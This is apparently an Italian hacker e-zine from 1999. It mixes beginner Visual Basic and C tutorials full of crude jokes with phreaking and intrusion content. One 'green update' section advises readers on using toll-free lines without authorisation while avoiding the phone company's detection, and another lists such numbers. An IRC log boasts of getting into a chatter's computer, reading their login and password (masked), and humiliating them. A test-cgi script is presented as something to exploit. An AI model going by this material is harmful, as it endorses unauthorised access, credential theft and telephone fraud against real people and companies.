form una finestra; inizieremo inserrendo nel nostro form 2 CommandButton (pulsante), 1 TextBox (casella di testo) e 1 Label (etichetta). Ogni oggetto (form, pulsanti, etichette....... sono tutti oggetti) ha delle propriet (alcune delle quali possono essere modificate) e dei metodi. Un metodo una funzione supportata dall'oggetto (ad es. possiamo, tramite l'apposito metodo nei controlli directory, fare un refresh della directory corrente).... questi li useremo successivamente. Parliamo ora delle propriet. Premendo con il tasto destro del mouse sul CommandButton, l'ultima voce del men di popup indicher la voce "propriet"; cliccateci. Nella finestra comparsa potrete modificare le propriet dell'oggetto. Prima di tutto il nome: button1 non molto esplicativo, e se all'inizio potrebbe andare bene, con la creazine di programmi pi complessi potrebbe non essere abbastanza chiaro. Quindi sempre opportuno dare un nome preciso ad ogni oggetto. Ad es., al pulsante di uscita, gli daremo il nome "cmdEsci". Il prefisso "cmd" lo usiamo per "ricordarci" che si tratta di un pulsante. Ecco i prefissi pi importanti: cmd CommandButton lbl Label txt TextBox frm Form pic PictureBox fra Frame img Image chk CheckBox opt OptionButton cmb Combobox lst ListBox drv DriveListBox dir DirListBox fil FileListBox Ogni oggetto ha alcune propriet caratteristiche ed altre comuni agli altri. Le pi comuni (quelle che userete di pi) sono: Name Indica il nome del controllo (il form composto da controlli). Useremo questo nome per far riferimento al controllo. Caption Indica quello che sar visualizzato sul controllo (per es. il testo del CommandButton) Enable Indica se il controllo pu essere attivato o meno Height Indica la distanza del lato in alto del controllo dal lato superiore del Recipient (il Recipient lo spiegheremo molto pi avanti, per il momento sappiate che quello che usiamo pi spesso come Recipient il form) Width Indica la distanza del lato sinistro del controllo dal lato sinistro del Recipient Visible Indica se il controllo visibile ... Magari in uno dei prossimi numeri far una tabella con tutte le propriet e i rispettivi controlli che le supportano... vedremo. Ora chiamiamo il form "frmPrincipale", un pulsante "cmdEsegui" e l'altro "cmdEsci", il TextBox "txtTesto" e la Label "lblTesto" (quando una Label si riferisce a un TextBox io di solito gli d lo stesso nome... solo una questione di comodit). Lo scopo del programma visualizzare un testo (contenuto in txtTesto) 3 volte. Assegnamo le caption ai vari oggetti (compreso il form.... inventate un titolo) e passiamo al codice. Quella che abbiamo creato ora l'interfaccia, quello cio che l'utente vede, con il quale l'utente interagisce. Come detto, passiamo al codice. Prima di tutto dobbiamo scegliere gli eventi da gestire (nel nostro caso i pulsanti). Facendo doppio click su un oggetto, appare la finestra codice. In alto sono presenti 2 ComboBox: quella a sx indica l'oggetto (tranne "generale" che vedremo dopo) mentre a dx ci sono i vari eventi gestibili per l'oggetto selezionato. Facendo ad es. doppio click su cmdEsci, avremo a sx "cmdEsci", e a dx "Click": significa che quella routine gestisce l'evento CLICK sul pulsante CMDESCI. Ecco come potrebbe essere un esempio di codice: Sub cmdEsegui_Click() Dim I as Integer Dim Testo as String For I = 1 to 3 MsgBox Testo Next I End Sub Sub cmdEsci_Click() Unload frmPrincipale End End Sub Cominciamo con la seconda routine. Questa viene richiamata quando si verifica l'evento Click sul pulsante cmdEsci. La prima istruzione, Unload xxx, scarica dalla memoria il parametro indicato che pu essere un form o una matrice (sulle matrici ci torneremo in uno dei prossimi numeri). La seconda, End, interrompe l'esecuzione del codice, chiude i file aperti con l'istruzione Open (anche questa rimandata al futuro) e annulla le variabili. Questa istruzione facoltativa... ma sempre comoda!!! La prima routine un p pi "complessa"... e necessita di qualche spiegazione in pi. L'istruzione Dim serve per dichiarare le variabili. In VB non obbligatorio dichiarare le variabili (a meno che voi, con un'apposita istruzione, non lo facciate diventare tale). Nonostante questo, sempre buona abitudine farlo, anche perch altrimenti il compilatore le considerer tutte di tipo Variant (vedi sotto). Vi sono diversi tipi di variabili. Questa una parte della guida che riepiloga i tipi di dati: *********************************************************************** Tipo di dati Spazio su disco Intervallo Byte 1 byte Da 0 a 255 Boolean 2 byte True o False Integer 2 byte Da -32.768 a 32.767 Long (intero lungo) 4 byte Da -2.147.483.648 a 2.147.483.6477 Single (virgola mobile a precisione semplice) 4 byte Da -3,402823E38 a -1,401298E-45 per valori negativi; Da 1,401298E-45 a 3,402823E38 per valori positivi Double (virgola mobile a precisione doppia) 8 byte Da -1,79769313486232E308 a -4,94065645841247E-324 per valori negativi; Da 4,94065645841247E-324 a 1,79769313486232E308 per valori positivi. Currency (intero diviso) 8 byte Da -922.337.203.685.477,5808 a 922.337.203.685.477,5807 Decimal 14 byte +/-79.228.162.514.264.337.593.543.950.335 senza virgola; +/-7,9228162514264337593543950335 con 28 decimali; il numero minore diverso da zero +/-0,0000000000000000000000000001 Date 8 byte Dall'1 gennaio 100 al 31 dicembre 9999 Object 4 byte Qualsiasi riferimento Object String (lunghezza variabile) 10 byte+lung. stringa Da 0 a circa 2 miliardi String (lunghezza fissa) Lunghezza stringa Da 1 a circa 65.400 Variant (con numeri) 16 byte Qualsiasi valore numerico fino all'intervallo di un Double Variant (con caratteri) 22 byte+lung. stringa Stesso intervallo di String a lunghezza variabile Definito dall'utente (utilizzando Type) Num. richiesto dagli elementi L'intervallo di ciascun elemento identico a quello del relativo tipo di dati sopraelencato. *********************************************************************** Per cercare di utilizzare il minor numero di risorse possibili, inutile utilizzare un variant quando potrebbe bastare un integer. Quindi sempre necessario controllare quali valori dovranno finire nella variabile e dichiararla di consenguenza cercando di ottimizzare le risorse. Nel nostro esempio le variabili I e N sono di tipo Integer, mentre Testo di tipo String. E' possibile dichiarare pi variabili su una riga, ad es. Dim I as Integer, Testo as String uguale rispetto alla sintassi dell'esempio. Ritorneremo sul discorso delle variabili quando sar il momento di definirne qualcuna nostra (con il comando Type)........ Abbiamo detto che il messaggio in txtTesto viene visualizzato 3 volte. Per fare questo utilizziamo un ciclo For. La sintassi : For x = y to z Step w [istruzioni] Next x dove x il contatore (la variabile che sar incrementata), y il valore iniziale, z il valore finale e w il margine di incremento (di quanto cio l'indice aumenta ad ogni esecuzione del ciclo). L'opzione Step non obbligatoria e, nel caso non fosse presente, viene preso come riferimento il valore 1. Lo Step pu anche essere negativo (ad es. -1). ATTENZIONE AI CICLI INFINITI!!!!!! Infatti scrivendo per esempio: For x = 1 to 5 Step -1 Si avr un ciclo infinito........ Potrebbe essere necessario uscire dal ciclo prima della fine dello stesso (ad es. al verificarsi di una certa condizione). Esiste in VB un comando che permette di uscire dal ciclo in qualunque momento. Il comando in questione Exit For. E' anche possibile fare dei cicli nidificati (uno dentro l'altro). Per esempio: For I = 1 to 100 For M = 1 to 50 [istruzioni] Next M Next I Nell'esempio si esegue un ciclo ad indice I 100 volte, e, per ognuno di questi cicli, ce n' un altro ad indice M che si ripete 50 volte. Esiste inoltre un altro tipo di ciclo che vedremo in una delle prossime volte (se ci saranno) =) Ron|n ͻ Ŀ C TUTORIAL [ prima parte ] ٺ ͼ Il C e il C++ sono probabilmente i linguaggi di programmazione preferiti dai professionisti, e sicuramente quelli preferiti dagli hackerz per i loro loschi scopi. Quindi ora tentero' di spiegarvi i fondamenti del C.... Ecco come si potrebbe presentare un semplicissimo programma C : ----- #include main(){ int numero; numero = 3; printf("Oggi la mamma di GiovanBattista ha fatto %d bucchini",numero); numero++; printf("\n\rIeri invece ne ha fatti %d",numero); } ----- Allora, la prima riga del codice, #include , dice al compilatore di includere nel programma funzioni, tipi e costanti definite in stdio.h. stdio e' appunto una libreria che contiene le funzioni di base per l'input e l'output. Il blocco principale, quello che viene eseguito automaticamente all'avvio del programma, si chiama main. Le due parentesi tonde dovrebbero contenere gli argomenti da passare alla funzione, in questo caso sono vuote, perche' non viene passato nessun argomento. Le parentesi graffe, invece, indicano l'inizio e la fine di un blocco (in questo caso la funzione main). Con la terza riga, int numero, dichiariamo una variabile chiamata numero, di tipo int (cioe' che va da -32767 a 32767) altri tipi di variabili comunente usate sono : long = da -2147483647 a 2147483647 float = da 3,4 * (10**-38) a 3,4 * (10**+38) double = da 1,7 * (10**-308) a 1,7 * (10**308) Il tipo char, invece, indica un carattere, che in C altro non e' che un numero. Il tipo unsigned char puo' andare da 0 a 255, mentre un signed char da -127 a 127. Un carattere viene racchiuso tra apici, ed essendo in realta' un numero e' lo stesso fare.... carattere = 'A' oppure.... carattere = 65 In entrambi i casi il carattere sara' la A maiuscola, dato che 65 e' il codice ASCII che identifica la A. Tornando al codice di esempio, con la quarta riga, numero = 3, assegnamo il valore 3 alla variabile numero. = infatti e' in C l'operatore di assegnamento. Successivamente c'e' una chiamata alla funzione printf, contenuta appunto in stdio (per questo abbiamo incluso stdio.h). printf e' seguito da una coppia di parentesi tonde all'interno delle quali sono racchiusi i parametri da passare alla funzione, in questo caso la stringa da stampare. Notiamo che le stringhe in C vengono racchiuse tra virgolette. All'interno delle virgolette si trova anche %d. Cos'e' ? Semplicemente una specifica di stampa, che indica un numero decimale. Il compilatore capisce che al posto di %d dovra' stampare sullo schermo un numero, che verra' passato come argomento successivamente. Gli argomenti sono separati da virgole. In questo caso alla specifica di stampa %d verra' sostituito il valore della variabile numero, che contiene 3. Quindi apparira' sullo schermo : Oggi la mamma di GiovanBattista ha fatto 3 bucchini "numero++;" e' l'equivalente di "numero = numero+1;". Se avessimo voluto incrementarlo di 3 invece avremmo dovuto scrivere "numero+=3;", per decrementarlo basta sostituire i piu' con meno. In questo caso il numero viene incrementato di una sola unita', e conterra' quindi 4. La chiamata seguente a printf stampera' al posto di %d il nuovo valore di numero, e scrivera' quindi : Ieri invece ne ha fatti 4 \n e \r vengono interpretati come caratteri speciali corrispondenti rispettivamente a e , cioe' \n va alla riga successiva e \r torna a capo. Il programma termina con } che indica la fine del blocco main. Al contrario di printf, main non e' seguita da un punto e virgola, ma dalle parentesi graffe che racchiudono il codice, essendo in questo caso non una chiamata a funzione, ma una definizione di funzione (cioe' noi non chiamiamo la funzione main, ma la definiamo, "costruendo" il codice che la comporra'. Una definizione di funzione contiene il codice da eseguire quando la funzione viene chiamata, mentre una chiamata alla funzione esegue quel codice gia' stabilito dalla definizione). Le specifiche di stampa vengono usate con printf per indicare il formato di cio' che vogliamo stampare a video. Es. /* Tutto cio' che e' racchiuso tra questi due simboli viene considerato un commento */ #include main(){ char carattere; carattere = 'A'; printf("%cBC",carattere); printf("\n\r%dBC",carattere); // anche questo viene considerato // commento } La prima chiamata a printf stampa sullo schermo "ABC", dato che abbiamo dato come specifica di stampa della variabile carattere %c, cioe' carattere. La seconda invece scrivera' "65BC", perche' sotto forma di decimale 'A' equivale a 65. E' ovviamente possibile utilizzare piu' specifiche di stampa in una sola chiamata. Es. printf("Sotto forma di carattere %c, sotto forma di numero %d",carattere,carattere); Per gestire l'input dalla tastiera, invece, sempre per rimanere nell'ambito delle funzioni di stdio, possiamo usare la funzione scanf. Es. #include main(){ int ilnumero; scanf("%d",&ilnumero); } %d indica che la scanf deve prepararsi a ricevere come input dalla tastiera un numero intero, &ilnumero indica DOVE schiaffare questo valore. La & davanti al nome della variabile indica l'indirizzo in memoria della variabile. Cioe', mentre ilnumero indica il valore della variabile (in questo caso un numero), &ilnumero indica il posto in memoria dove si trova la variabile ilnumero. Dato che scanf si aspetta un indirizzo e' necessario inserire l'indirizzo della variabile ilnumero, e viene fatto appunto con &. Dato che una variabile puo' occupare piu' di una "casella" in memoria, viene considerato come indirizzo quello della prima casella. Per indicare invece il valore contenuto in un indirizzo di memoria si utilizza *. Esiste una tipo di variabile chiamato puntatore, che contiene un indirizzo. Es. #include main{ int *ilpuntatore; int ilnumero; ilpuntatore = &ilnumero; scanf("%d",ilpuntatore); } Con "int *ilpuntatore;" dichiariamo la variabile ilpuntatore come un puntatore a una variabile di tipo int (infatti dovra' contenere l'indirizzo di ilnumero, che e' un int). "ilpuntatore = &ilnumero" assegna alla variabile ilpuntatore l'indirizzo in memoria della variabile ilnumero. Quando chiamiamo scanf, quindi, possiamo passare come parametro ilpuntatore, senza usare la &, dato che ilpuntatore contiene gia' l'indirizzo di ilnumero. Come ho gia' detto, per riferirsi al valore contenuto in un indirizzo di memoria, si usa l'asterisco (*), quindi, una volta assegnato a ilpuntatore l'indirizzo della variabile ilnumero, e' la stessa cosa fare .... ilnumero = 3; oppure ..... *ilpuntatore = 3; Invece scrivere "*&ilnumero = 3;" e' una grandissima stronzata perche' e' la stessa cosa di "ilnumero = 3;", solo con due caratteri in piu' :) Un altro tipo di variabile, invece, e' l'array. Un array e' un insieme di variabili, che hanno lo stesso nome e che vengono quindi identificate da un numero. Es. int inumeri[50]; La variabile inumeri non conterra un numero solo ma 50 numeri. inumeri[0] conterra' il primo numero, inumeri[1] il secondo, fino a inumeri[49], che conterra' il cinquantesimo numero. Es. inumeri[20] = 25; Ovviamente e' possibile definire array di dimensioni diverse e anche array a piu' dimensioni. Es. int tris[3][3]; In questo caso e' un array rappresentante uno schema di tris (3 righe per 3 colonne). tris[0][0] rappresentera' la prima casella e tris[2][2] l'ultima. Passiamo ora ad una parte fondamentale : la creazione di nuove funzioni. Infatti scrivere tutto il codice in main non sarebbe certo elegante, e creerebbe molta difficolta' nella comprensione del programma e nella ricerca di errori, soprattutto per programmi complessi. Es. #include int doppio(int unnumero); main(){ int numero; scanf("%d",&numero); printf("\n\rIl doppio di %d %d",numero,doppio(numero)); } int doppio(int unnumero){ return unnumero*2; } La prima riga dopo l'include, "int doppio(int unnumero);" e' il prototipo della funzione doppio, che verra' definita successivamente, dopo il main. La parola int prima del nome della funzione indica che la funzione ritorna (cioe' restituisce come risultato dell'operazione) un valore di tipo int. All'interno delle parentesi ci sono i parametri accettati dalla funzione. In questo caso e' uno solo, e' di tipo int, e viene riconosciuto all'interno della funzione con il nome "unnumero". Una funzione che non ritorna alcun valore (cioe' che serve solo ad eseguire una serie di istruzioni) viene preceduta da void. Se una funzione non accetta argomenti allora si scrive void tra le parentesi tonde. "return" serve a definire il valore di ritorno della funzione. In questo caso costituisce l'unica riga della funzione, e ritorna il numero passato come argomento moltiplicato per 2. Un programma dovra' compiere delle scelte, e per fare cio' si usa l'istruzione "if". Es. if (lamammadigianteoboldohachiavato()) nonchiavartela(); In questo caso il programma controlla il valore di ritorno della funzione "lamammadigianteoboldohachiavato()". Se il valore di ritorno e' 1 (considera 1=VERO 0=FALSO) allora eseguira' la funzione "nonchiavartela()" AltroEs. if (!lamammadigianteoboldohachiavato()) chiavatela(); In questo caso se la funzione lamammadigianteoboldo NON restituisce 1 (e quindi vero) esegue la funzione chiavatela(); Il punto esclamativo (!) infatti e' in C la negazione. Cioe' in questo caso viene intesa cosi' : se NON E' VERO che la funzione lamammadigianteoboldohachiavato ha ritornato 1, allora esegui chiavatela(); Prendiamo ora un altro esempio... if (numero>100) printf("eh cosi' grande ! non ce la faccio a elaborarlo !"); // :) Cosa succede ? Il simbolo > vuol dire "maggiore di", questo lo sapevamo, ma la if non si limita a vedere se un espressione e' vera o falsa ? Appunto. Se numero e' maggiore di 100 allora (numero>100) sara' vero, altrimenti falso. Se si vogliono eseguire, a una certa condizione, piu' di un'istruzione, si devono racchiudere le istruzioni tra due graffe. Es. if (seistronzo()){ vaffanculo(); nonmirompereilcazzo(); } Per un'alternativa si usa invece "else" Es. if (seistronzo()){ vaffanculo(); nonmirompereilcazzo(); } else { benvenuto(); accomodatipure(); } E' anche possibile utilizzare gli operatori binari... Es. if ((seistronzo()) || (seiscemo()) || (seiunrompipalle())) { vaffanculo(); nonmirompereilcazzo(); } || rappresenta infatti l'OR. Cioe' se anche solo una delle espressioni e' vera, allora si avvera la condizione. && invece e' l'AND, cioe' la condizione e' soddisfatta solo quando TUTTE le espressioni risultano vere, mentre ^ e' lo XOR, cioe' l'OR esclusivo (se solo una delle due espressioni e' vera allora si avvera la condizione, se sono entrambe false o entrambe vere la condizione non e' soddisfatta) Passiamo ora ad esaminare i cicli in C. "while" viene usato nella sintassi : while (condizione){ ...codice da eseguire a ogni ripetizione... } E ripete le istruzioni tra le graffe fino a quando e' vera la condizione. Per una sola istruzione si potrebbero anche non usare le graffe, ma conviene sempre usarle per evitare confusione. Es. #include main(){ int ipriminumeri[10]; int numero; numero = 0; while (numero<10){ ipriminumeri[numero] = numero; numero++; } } Questo codice ripete il ciclo finche' la variabile numero e' minore di 10, e assegna agli elementi dell'array ipriminumeri i numeri da 0 a 9. Il controllo sulla condizione viene eseguito prima delle istruzioni contenute nel ciclo. Per farlo eseguire dopo le istruzioni del ciclo si usa do. Sintassi : do { ...Istruzioni da eseguire.... } while (condizione); "for", invece, e' in realta' inutile, ma offre indubbie comodita' in alcuni casi rispetto a while. Es. #include main(){ int t; for (t=0;t<10;t++){ ..codice.. ..codice.. ..codice.. } } I tre campi tra le parentesi sono separati da 2 ; e sono, rispettivamente, l'inizializzazione delle variabili, la condizione, e l'aggiornamento. In pratica all'inizio (prima che il ciclo cominci) alla variabile t e' assegnato il valore 0. La condizione e' (t<10), cioe' il ciclo continuera' fino a quando il valore della t sara' minore di 10. L'aggiornamento e' t++, cioe' alla fine di ogni ciclo la t viene incrementata di 1. In questo caso il valore di t viene incrementato alla fine del ciclo. Se avessimo scritto ++t sarebbe stato incrementato all'inizio. E' anche possibile inizializzare piu' variabili... for (t=0,s=0,z=0;t<10;t++,s++,z-=2){ ..codice.. ..codice.. ..codice.. } Per terminare un ciclo in anticipo si utilizza "break", senza parentesi. "continue", invece consente di ritornare direttamente all'inizio del ciclo senza eseguire le istruzioni successive. Ecco, questi sono i fondamenti del C. CRUSAD3R CRUSAD3R2@hotmail.com http://members.xoom.com/CRUSAD3R/index.htm ͻ Ŀ GREEN UPDATE [ che sfiga ne han beccati altri ] ٺ ͼ Questo articolo lo scrivo dopo che altre persone sono state bustate per l' uso di green senza ovviamente averne l' autorizzazione ... Allora i green sono pericolosi e anche fare del sano war-dialing fa' sospettare qualcosa agli op telecazz [ come detto anche in bfi se non sbaglio fare 1000 chiamate ai green in un giorno puo' risultare alquanto sospetto visto che teleczz logga le abitudini dell' utente ] allora un consiglio , non dico di non usarli [ fischia la bolletta costa ] ma usateli in pochi [ x esempio se uno trova un green e riesce ad accedervi non sparga la voce in mezza internet e faccia collegare 3000 persone ma lo usi x lui ] comprate un volmetro per controllare la tensione della linea ..... Conviene e ricordateve che se vi bustano son solo cazzacci vostri . ZeroCool ͻ Ŀ IL LOG DEL MESE ٺ ͼ Ok allora questa parte della rivista include la conversazione + divertente del mese in irc con qualche coglione ... [ se non vi piace la togliamo ] ....[ ps ho tolto alcune cosa come login e passwd di quel povero cristo e alcune correzioni a livello grafico ] Session Start: Session Ident: Nike1 (~xandria20@poort6-ip-x2.enertel.cybercomm.nl) hello Ciao ciao ascolta sai qualcosa di hacking Non molto Io sono un grande hacker Ma va? Io uso Net-bus e Back orifice alla perfezione penso che nessuno sia piu' bravo di me Quindi usi windowz Certo linux e gli altri os sono cagate ..... Il mio sitema e' impenetrabile Magari hai anche un firewall installato No , sono stronzate Ah io uso il firewall della Conseal ma non riesco a trovare un settaggio perfetto x i rulez Toglilo non serve a un cazzo e fa perdere solo tempo Seguiro' il tuo consiglio sicuramente Ascoltami e diverrai anche tu un grande HaCkeRzz come me O lamer Se segui i miei consigli non diventerai certo un lamer Ah capito , sai cosa e' phf e come si usa come exploit Un prog di tanti anni fa quando usavo ancora il mio caro 286 Ah grazie del consiglio Sono entrato in un pc Ora prendo' cio' che serve e poi cancello tutto con cosa? Net-Bus ovviamente con net-bus ah capisco Chissa la faccia del coglione quando gli cancello tutto? gia' chissa , prova fatto Con quel prog puoi prendere gli account ? Penso di si Come pensi? Non avevo mai provato a farlo ok ho capito una cosa cosa? Nel tuo pc ci entra anche un cane CHE CAZZO DICI? LA verita' Che belle passwd che hai Che passwd io non ne ho come ti colleghi a internet senza coglione [ non penso che tu viva in un cibercaffe] Tanto non puoi prenderle sono protette dal mio windowz La minchia userid: xxxxxxxxxx passwd: xxxxxxxx bastardo io ti denuncio A chi grande hacker che usa net-bus e bo [ impara qualcosa d'altro che ti conviene ] non usare le mie passwd per favore chiedilo in ginocchio ... ahhahahaha per favore Ora il grande hacker striscia????? Io supplico non striscio quanti anni hai? 22 e ti fai ancora la pippi addosso coglione.... byezzzzz Session Close ͻ Ŀ COSA DI SOLITO CONTIENE IL FILE TEST-CGI.CGI ٺ ͼ Forse vi puo' essere utile allora vediamolo: #!/bin/sh echo Content-type: text/plain echo echo CGI/1.0 test script report: echo echo argc is $#. argv is "$*". echo echo SERVER_SOFTWARE = $SERVER_SOFTWARE echo SERVER_NAME = $SERVER_NAME echo GATEWAY_INTERFACE = $GATEWAY_INTERFACE echo SERVER_PROTOCOL = $SERVER_PROTOCOL echo SERVER_PORT = $SERVER_PORT echo REQUEST_METHOD = $REQUEST_METHOD echo HTTP_ACCEPT = "$HTTP_ACCEPT" echo PATH_INFO = $PATH_INFO echo PATH_TRANSLATED = $PATH_TRANSLATED echo SCRIPT_NAME = $SCRIPT_NAME echo QUERY_STRING = $QUERY_STRING echo REMOTE_HOST = $REMOTE_HOST echo REMOTE_ADDR = $REMOTE_ADDR echo REMOTE_USER = $REMOTE_USER echo CONTENT_TYPE = $CONTENT_TYPE echo CONTENT_LENGTH = $CONTENT_LENGTH Esistono degli exploit su questo tipo di cgi di cui parleremo nel prossimo numero intanto , osservate e documentatevi...ZeroCool ͻ Ŀ GREEN UPDATE ٺ ͼ allora qua voglio fare cio'che + mi piace cioe' dare di green [ sembra una brutta cosa a dirla ] Ok voglio dire che ora dopo che questo mi e' stato gentilmente fatto notare cerchero' di dare descrizioni x quanto mi e' possibile , o almeno ci provo ... Ok iniziamo ...: 167012837 un green di Tin x fare gli abbonamenti on-line [ se qualcuno ha info su sto green mi contatti x favore ]. 167231412 numero di CABI service 167615615 Banco Di Sardegna Phonebanking 167353415 DigiBank Internet Provider 167273626 Wall Net Telecomunicazioni 167274940 Internet Provider 167863191 Banca Dati [Roma] 167250789 Internet Provider 167807111 Informazioni Affari Banche Dati 167534220 Internet Provider [torino] 167212736 Internet Provider 167330149 Galactiva srl 167246140 Fax servizio Clienti 167852477 Intermedia Link Exchange 167018931 ISICOM srl , call center 167279147 Vendita Computer 167244035 Flah Net 167255285 Telegest 167258251 .... Magari possono rendersi utili x voi che cazz ne so ; spero di darvene di + la prossima volta. ZeroCool ͻ Ŀ MA QUANTO E' BELLA LA VITA ٺ ͼ Allora sto cazz di articolo lo scrivo precisando che non centra un cazz con hacking , phreacking e cazzate varie .... E' solo una notizia che se vera rende felice molta gente. Allora la cara Telecazz notando la diminuzione di chiamate urbane [ quindi la cara TUT ] ha deciso [ o almeno si spera ] di diminuire il costo delle stesse visto che la maggior parte delle persone utilizza maggiormente il telefono chiamando in urbana ... Spero che sia vero e anche se retupo Telecazz una societa' di m.r.d. credo che stavolta fara' qualcosa di buono e questo mi rende gioioso o forse se ne sbattera' le palle degli utenti come sempre ha fatto ..Mha spero non la seconda. Un sito molto bello che si oppone alla tut [ e che di cui penso ne avrete letto da 100000 parti ] e' www.notut.com che protesta contro la tariffa urbana a tempo [ un protesta che viene fatta in modo legale ] guardatelo ne vale la pena.. ZeroCool ͻ Ŀ SALUTI ٺ ͼ Ora che siamo arrivati alla fine di questa e-zine volevo solo salutare alcune persone: zerocool, AX1S, w00w00, ulntwh99, |lucio, kalidor, Dante Alighieri, Blum, |O2|, Biavo darkside, SpiritoZ, fusyllo, XsX, grays, Ap, Ja[3]cK, overmars, w0rf, cavallo, pigpen, Ron|n, tizio, /sPIRIT/, vecna, Dark Schnaider, linbus, vulcan, crusade3r, bricciolo, lord destruction, grays, spindoc , Ron|n, claytonu2, KaOsS, quilecool, icemaze, XsX, crazy crom, DrShade, Cyrus The Virus, ChEm-BoY, {D4m4g3~m4n}, lord shinva, lordjoker, _p0nic0_, ghimlet, pigreco, biavo, andrea, sentenza ,quelli di BFI (grandi!), quelli di Spaghetti Phreaker (mitici!), quelli di tutte le e-zine italiane che esistono ma delle quali ignoro l'esistenza (gnurant...),quelli della crew RAVENLOFT tra cui DeLtAfOx ^acidburn, rafcrash, ]BoNzO[, vito, daguerra e quelli della crew TRH Tirol, D4d3z, Dudez, m4w, 0V3RR1D3, L0RD^BYTE, Acid, il gruppo Spippolatori (SPP) con Master, RigoR MorteM, e gli altri del (l'ancora esistente nonostante l'attacco in massa di noi newbies... senza pieta'...) ng ahccc Teresa Luan Canis, X-Hacker, Harlock, Misha, ChRoMe, ADaM, F14m3r, La Duchessa con l'Ermellino, Brigante, Fritz, The Duke, Buttha, neverin, Azathoth, Nebbia, Red Owl, 3eGIN^NeR, Alby, Yota, NighTiger, Black Baron, NO SPAM, Mr Good Trips, Macchia Nera, Kernel, Meimi, GekoVamp, Interbusiness, MasteR_OnE, Francesco Mapelli, AntoMar, erGoline, SirPsychioSexy, DR. SCHaFauSeN, Newbie 1.0, Cyberlele, tutti quelli del mitico it.comp.sicurezza tra cui Leonardo Serni, Kernel, Giglio, Marco d'Itri, Firebeam, Krmel, invy, Ataru Moroboshi, Marco d'Itri e gli altri di it.comp.sicurezza.virus, che purtroppo anche se scarico sempre riesco a leggere poche volte :(( Se vi ho dimenticato be....mi rifaro' la prox volta. |^__^| Ps: dedico questa e-zine a K4m4l30nt3, colui con il quale ho iniziato quest'avventura e che ora non e' piu' tra noi.... dovunque tu sia questa e' per te fratello. _--={ (^__^) }=--_ Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma non potete fermarci tutti... dopo tutto, siamo tutti curiosi uguali e con la stessa voglia di smanettare e di capire. +++Illo N0bodY88+++ January 16, 1999 Ok ora voglio fare anche io un mega salutone a Dark Schnaider [ complimenti x il sito ] , Biavo , w00w00 e tutti gli altri amici mirc che frequentemente vengono sul nostro beneamato canale #hackernow [ grazie di tutto cuore siete mitici ] . Ah mi dimenticavo una cosa .... Fanculo ai Lamer siete esseri immondi .... Come sono buono eh.. Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me , ma almeno aspettate che abbia fermato tutti i lamer di questo universo , dopo tutto non siamo tutti uguali ZeroCool ah vi lascio con una domanda fondamentale x la vostra vita : che ore sono e perche' non sono gia' andato a ronfare , mha forse per scrivere ste cazz di 3 righe ...? _ _ ____ _ | \ | | _____ _| __ )(_) ___ ___ | \| |/ _ \ \ /\ / / _ \| |/ _ Y __| | |\ | __/\ V V /| |_) | | __|__ \ |_| \_|\___| \_/\_/ |____/|_|\___|___/ Webmaster by ---------> ZeroCool & Kalidor E-zine by ------------> N0bodY88 & ZeroCool Ascii by -------------> N0bodY88 Loghi NewBies by -----> RigoR MorteM Byez a tutti questo 1 num della e-zine e' finito, se volete commentare la e-zine, aiutarci mandandoci i vs articoli x pubblicarli sui num. prossimi (se...ehehe), scrivete a n0body88@freemail.it.